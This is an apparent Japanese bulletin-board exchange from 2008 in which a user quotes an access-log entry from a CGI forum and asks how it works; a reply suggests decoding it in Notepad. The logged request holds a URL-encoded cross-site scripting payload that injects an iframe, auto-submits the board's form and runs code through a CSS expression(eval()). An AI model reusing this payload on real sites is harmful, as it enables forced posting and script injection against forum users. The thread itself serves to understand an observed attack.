> 2008/09/27 (土) 05:09:55 ◆ ▼ ◇ [qwerty]> > VBでいうとこのForm1.Text1.textみたいなもんだな(;´Д`)
> じゃあ↓の場合は2行目から12行目までが"で括られているから長い文字列だよね?
> GETで渡された文字列に変数名みたいのが入ってるって事?
> -------------------------
> "GET /cgi-bin/bbs.cgi? HTTP/1.1" 200 5486
> "http://qwerty.on.arena.ne.jp/cgi-bin/bbs.cgi?mode=i&d=30&i=a&
> u=iframe+onload%3dmmm.document.forms[0].v.value%3dMath.floor(Math.random()*65536);
> mm.document.forms[0].submit();+name%3dmmm+src%3dhttp://qwerty.on.arena.ne.jp
> /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value%3d%3d30)
> {l%3dString.fromCharCode(60);r%3dString.fromCharCode(62);
> ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML%3dl%2bdocument.forms[0].
> u.value%2br;document.forms[0].d.value%3d123}&c=+style%3d{a:expression(eval(document.forms[0].count.value))}+%81"
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
> -------------------------
"http ... +%81”までをメモ帳にはっつけ;で改行してURIエンコード文字列をデコードしてからもう一度同じ質問をしてください(;´Д`)
参考:2008/09/27(土)05時05分14秒